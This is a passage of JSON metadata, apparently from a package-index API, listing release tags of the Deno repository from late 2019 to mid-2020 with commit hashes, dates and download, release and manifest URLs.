:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2